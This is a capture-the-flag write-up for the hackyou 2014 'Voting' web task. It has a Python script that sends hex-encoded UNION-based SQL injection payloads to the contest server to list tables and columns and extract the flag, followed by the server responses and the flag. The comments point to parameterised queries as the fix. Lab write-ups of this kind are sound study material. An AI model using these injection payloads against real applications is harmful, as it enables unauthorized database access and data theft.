# hackyou 2k14: Web - Voting (100 points)


# cat web.py
#!/usr/bin/python

import re, urllib, urllib2

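def inject(hexid):
    """POST one vote whose ``id`` field is *hexid* and return the raw response body.

    ``hexid`` is placed verbatim in the ``id`` form field; ``vote`` and ``submit``
    are fixed so the request looks like an ordinary form submission. The output
    further down shows the server echoing the first column of the UNION'd row
    back in its results table, i.e. ``id`` evidently reaches the SQL query
    unparameterised. On the server side a bound parameter (or an integer cast
    before the query string is built) for ``id`` is the fix.

    Returns the response body as a str. Raises urllib2.URLError (including
    urllib2.HTTPError for non-2xx replies) when the request fails.
    """
    url = 'http://hackyou2014tasks.ctf.su:10080/index.php'
    values = {
        'id'    : hexid,
        'vote'  : '1',
        'submit': 'Submit'
    }
    req = urllib2.Request(url, urllib.urlencode(values))
    res = urllib2.urlopen(req)
    try:
        return res.read()
    finally:
        # The original left the response (and its socket) open until GC.
        res.close()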

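# Each payload is sent as a 0x-prefixed hex literal in the ``id`` field; the
# results table in the response echoes the first column of the UNION'd row,
# which is how each answer comes back (see the output below the script).
#   1. list every table name visible to the DB user
#   2. narrow to table names starting with 'f' (finds ``Flag``)
#   3. list the columns of ``Flag``
#   4. read ``Flag.flag``
# Defender's note: a bound parameter for ``id`` stops every one of these.
PAYLOADS = (
    '100 union select group_concat(table_name) from information_schema.tables',
    "100 union select group_concat(table_name) from information_schema.tables where table_name like 'f%'",
    "100 union select group_concat(column_name) from information_schema.columns where table_name='Flag'",
)
for payload in PAYLOADS:
    hexid = '0x' + payload.encode('hex')
    print inject(hexid)

hexid = '0x' + '100 union select flag from Flag'.encode('hex')
match = re.search(r'CTF{.*}', inject(hexid))
# re.search returns None when no flag is in the response; calling .group()
# on that (as the original did) raises AttributeError instead of saying so.
print match.group() if match else 'flag not found in response'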
# ./web.py
<p><b>Thank you!</b> Results:</p><table border="1"><tr><th>Logo</th><th>Total votes</th><th>Average</th></tr><tr><td>CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,ENGINES,EVENTS,FILES,GLOBAL_STATUS,GLOBAL_VARIABLES,KEY_COLUMN_USAGE,PARAMETERS,PARTITIONS,PLUGINS,PROCESSLIST,PROFILING,REFERENTIAL_CONSTRAINTS,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,SESSION_STATUS,SESSION_VARIABLES,STATISTICS,TABLES,TABLESPACES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,INNODB_BUFFER_PAGE,INNODB_TRX,INNODB_BUFFER_POOL_STATS,INNODB_LOCK_WAITS,INNODB_CMPMEM,INNODB_CMP,INNODB_LOCKS,INNODB_CMPMEM_RESET,INNODB_CMP_RESET,INNODB_BUFFER_PAGE_LRU,columns_priv,db,event,func,general_log,help_category,help_keyword,help_relation,help_topic,host,ndb_binlog_index,plugin,proc,procs_priv,proxies_priv,servers,slow_log,tables_priv,time_zone,time_zone_leap_second,time_zone_name,time_zone_transition,time_zone_transition_type,user,cond_instances,events_waits_current,events_waits_history,events_waits_history_long,events_waits_summary_by_instance,events_waits_summary_by_thread_by_event_name,events_waits_su</td><td></td><td>0</td></tr></table><br><a href="index.php">Back</a><br>
<p><b>Thank you!</b> Results:</p><table border="1"><tr><th>Logo</th><th>Total votes</th><th>Average</th></tr><tr><td>FILES,func,file_instances,file_summary_by_event_name,file_summary_by_instance,Flag</td><td></td><td>0</td></tr></table><br><a href="index.php">Back</a><br>
<p><b>Thank you!</b> Results:</p><table border="1"><tr><th>Logo</th><th>Total votes</th><th>Average</th></tr><tr><td>flag</td><td></td><td>0</td></tr></table><br><a href="index.php">Back</a><br>
CTF{820178c33c03aaa7cfe644c691679cf8}
